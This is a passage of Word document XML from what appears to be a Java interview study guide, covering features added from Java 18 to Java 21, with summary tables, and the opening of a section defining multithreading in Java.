        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="202E9B1A"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68A562" w14:textId="4CDF5FA1"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666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C00B957"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readability and reduces boilerplate.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52D3252E"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E87CE3C">
          <v:rect id="_x0000_i1801" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="0946491B"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Sequenced Collections (JEP 431)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="686F39CB"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New interface that adds consistent ordering to Collections (first(), last(), etc.).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3143EA87" w14:textId="2F44BFCB"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E4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="660066"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>SequencedColle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quencedSet</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>&lt;&gt;();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D4EA5A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dds order-sensitive operations.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D3531B0"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FF7F09">
          <v:rect id="_x0000_i1802" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CBFEDC1"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String Templates (JEP 430 - Preview)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A10BD2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implifies string construction with embedded expressions.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34825B99" w14:textId="77777777"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21DB8E2B" w14:textId="3BB20D30"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 to \{name} 21!"</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0465AE18"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akes dynamic strings concise and readable.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BD4886A"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6B92855">
          <v:rect id="_x0000_i1803" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="33821F1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Scoped Values (JEP 446 - Preview)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21F0050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lastRenderedPageBreak/>
        <w:t>A safer alternative to thread-local variables, designed to work with virtual threads.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FFED769"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d for managing thread-local-like state safely in a structured way.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E9A8B25"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84CF0DE">
          <v:rect id="_x0000_i1804" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="49D8E687"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oreign Function &amp; Memory API (JEP 442 - 3rd Preview)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2110ABF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Modern and safe access to native code, replacing JNI.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17A15A21"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calling native libraries and allocating off-heap memory.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="240B5717"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C119AB">
          <v:rect id="_x0000_i1805" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="6218E28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Deprecations &amp; Removals</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FB802D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inalization is deprecated for removal.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="015257E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egacy APIs are cleaned and marked deprecated for future removal.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F036314"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2D025E42">
          <v:rect id="_x0000_i1806" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FFCE383"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CE4B95" w14:paraId="713DD1EA" w14:textId="77777777" w:rsidTr="004C7B2C">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="33B0F773"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2711CEF8"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Description</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004C7B2C" w:rsidRPr="00CE4B95" w14:paraId="51BF8F84" w14:textId="77777777" w:rsidTr="004C7B2C">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6BAAE555"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Virtual Threads</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="162CDA4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for scalable concurrency</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004C7B2C" w:rsidRPr="00CE4B95" w14:paraId="415B57A1" w14:textId="77777777" w:rsidTr="004C7B2C">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3CF1A919"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Record Patterns</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1DF0FE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ion of record types</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004C7B2C" w:rsidRPr="00CE4B95" w14:paraId="03829C96" w14:textId="77777777" w:rsidTr="004C7B2C">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="683DA28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Pattern Matching for switch</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1F90726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Type-safe, expressive switch</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004C7B2C" w:rsidRPr="00CE4B95" w14:paraId="316EE34E" w14:textId="77777777" w:rsidTr="004C7B2C">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="44BDE9E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equenced Collections</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="44C4153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Ordered collections with first/last semantics</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004C7B2C" w:rsidRPr="00CE4B95" w14:paraId="48D68AAC" w14:textId="77777777" w:rsidTr="004C7B2C">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0612F8A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tring Templates (Preview)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="20D93BC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Interpolated strings like ${} syntax</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004C7B2C" w:rsidRPr="00CE4B95" w14:paraId="6DDD4C54" w14:textId="77777777" w:rsidTr="004C7B2C">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6992B25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coped Values (Preview)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3BD177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afe alternative to ThreadLocal</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004C7B2C" w:rsidRPr="00CE4B95" w14:paraId="4B4604A5" w14:textId="77777777" w:rsidTr="004C7B2C">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5DC6240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156127F1"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Call native functions, work with memory safely</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="59F82014" w14:textId="40B69032" w:rsidR="004C7B2C" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="004C7B2C">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:pict w14:anchorId="31A92328">
          <v:rect id="_x0000_i1807" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DC18FCB" w14:textId="77777777" w:rsidR="00370A89" w:rsidRPr="00CE4B95" w:rsidRDefault="00370A89">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="267" w:name="_Toc197867481"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>What is the added version after Java 17 to Java 21?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="267"/>
    </w:p>
    <w:p w14:paraId="788CF291" w14:textId="2C236C08" w:rsidR="00946177" w:rsidRPr="00827C56" w:rsidRDefault="00946177" w:rsidP="00827C56">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27C56">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>✅</w:t>
      </w:r>
      <w:r w:rsidRPr="00827C56">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Java 18 (March 2022)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5242AE7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TF-8 by Default</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="632C0CEE"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Default character set is now UTF-8 across platforms.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BF8F06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imple Web Server (JEP 408)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="082BBFD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HTTP server for prototyping or testing.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="116B70D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Code Snippets in JavaDoc (JEP 413)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61D420B2"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nippet tag to embed code examples.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21F748E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611A6">
          <v:rect id="_x0000_i1808" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="26B4592D"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19 (September 2022) </w:t>
      </w:r>
      <w:r w:rsidRPr="00946177">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>(Preview/Incubator features)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FCDE0F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Preview – JEP 425)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="483C9130"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threads to simplify concurrent applications.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="569ACB75"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Incubator – JEP 428)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B7C2C5C"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ier and safer concurrent programming with better error handling.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35BE8BA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Preview – JEP 405)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69FF80E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Pattern matching for record types.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A00B02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Preview – JEP 406)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57719AC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se types and guards in switch expressions.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C4BDEB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00844">
          <v:rect id="_x0000_i1809" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="45AC208B"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0 (March 2023) </w:t>
      </w:r>
      <w:r w:rsidRPr="00946177">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>(More previews and enhancements)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77695D5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Incubator – JEP 429)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="202DF10D"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A replacement for thread-local variables in virtual threads.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D8546A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2nd Preview – JEP 432)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CF55B9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2nd Preview – JEP 433)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BC6F27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2nd Preview – JEP 436)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A51885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2nd Incubator – JEP 437)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54E75C4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9CF08">
          <v:rect id="_x0000_i1810" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="4ACBC2E5"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1 (LTS – September 2023)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0600A06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 xml:space="preserve">Java 21 is an </w:t>
      </w:r>
      <w:r w:rsidRPr="00946177">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>LTS (Long Term Support)</w:t>
      </w:r>
      <w:r w:rsidRPr="00946177">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> version and includes many finalized features:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6115BD9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lastRenderedPageBreak/>
        <w:t>Virtual Threads (Final – JEP 444)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A1762F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Final – JEP 441)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E3B483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Final – JEP 440)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="134D195B"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equenced Collections (JEP 431)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FD26937"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New interfaces: SequencedCollection, SequencedSet, SequencedMap.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="161B1C7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ing Templates (Preview – JEP 430)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="291F4DD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y embedding of expressions in strings.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30F9A6F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nnamed Classes and Instance Main Methods (Preview – JEP 445)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7488241B"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implifies writing simple Java programs (good for scripting &amp; learning).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25DE04B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Preview – JEP 446)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="516893E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580D78">
          <v:rect id="_x0000_i1811" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="33FF35E6" w14:textId="42B85B55"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Summary</w:t>
      </w:r>
      <w:r w:rsidR="00827C56">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8930"/>
      </w:tblGrid>
      <w:tr w:rsidR="00946177" w:rsidRPr="00827C56" w14:paraId="25C58135" w14:textId="77777777" w:rsidTr="00946177">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="60C393BE"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Version</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4A07BC09"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Major Features Introduced</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00946177" w:rsidRPr="00827C56" w14:paraId="4EC35CD3" w14:textId="77777777" w:rsidTr="00946177">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="24FAA33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8</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3E549ACC"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TF-8 default, simple HTTP server</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00946177" w:rsidRPr="00827C56" w14:paraId="2334364F" w14:textId="77777777" w:rsidTr="00946177">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="37CCE6E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9</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4AC2834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preview), pattern matching enhancements</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00946177" w:rsidRPr="00827C56" w14:paraId="564462A8" w14:textId="77777777" w:rsidTr="00946177">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2514288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20</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1164776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2nd preview, structured concurrency 2nd incubator</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00946177" w:rsidRPr="00827C56" w14:paraId="241B8133" w14:textId="77777777" w:rsidTr="00946177">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1889BD7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Java 21</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="77376B47"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Final)</w:t>
            </w:r>
            <w:r w:rsidRPr="00946177">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>, Pattern matching, Record patterns, String templates, Sequenced collections</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="287B7183" w14:textId="7DD273BD" w:rsidR="0066065E" w:rsidRPr="0066065E" w:rsidRDefault="00000000" w:rsidP="0066065E">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:pict w14:anchorId="22BE6918">
          <v:rect id="_x0000_i1812" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="69D62904" w14:textId="5AE9963B" w:rsidR="00500D6E" w:rsidRPr="00CE4B95" w:rsidRDefault="00500D6E">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D2C5292" w14:textId="77777777" w:rsidR="008A25EB" w:rsidRPr="00CE4B95" w:rsidRDefault="006A20C6" w:rsidP="006A20C6">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="7030A0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="268" w:name="_Toc197867482"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="7030A0"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Multithreading</w:t>
      </w:r>
      <w:bookmarkEnd w:id="268"/>
    </w:p>
    <w:p w14:paraId="1D5717EF" w14:textId="77777777" w:rsidR="00C836C6" w:rsidRPr="00CE4B95" w:rsidRDefault="00C836C6" w:rsidP="00C836C6">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="618EBAF3" w14:textId="77777777" w:rsidR="009A5F2F" w:rsidRPr="00CE4B95" w:rsidRDefault="009A5F2F">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="269" w:name="_Toc197867483"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>What is multithreading in java?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="269"/>
    </w:p>
    <w:p w14:paraId="1B2B7598" w14:textId="4F138C5B" w:rsidR="00BD73D4" w:rsidRPr="00AA311A" w:rsidRDefault="00BD73D4" w:rsidP="00AA311A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="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n Java refers to the concurrent execution of two or more threads, allowing a program to perform multiple tasks simultaneously. A </w:t>
      </w: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is a lightweight process, and multithreading enables multiple threads to run in parallel, improving the efficiency and performance of applications, especially on multi-core processors.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D4B16F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Concepts of Multithreading in Java:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74BCFE42"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A thread is a small unit of a process that can run independently. Every Java application has at least one thread — the </w:t>
      </w:r>
      <w:r w:rsidRPr="00AA311A">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>main thread</w:t>
      </w:r>
      <w:r w:rsidRPr="00AA311A">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — which is created when the program starts.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="117325FC"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It allows a program to run multiple threads concurrently. Each thread shares the same memory space, which makes it more efficient than multiple processes (which have separate memory spaces).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0984FFB4"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 vs Parallelism</w:t>
      </w:r>
      <w:r w:rsidRPr="00AA311A">
        <w:rPr>
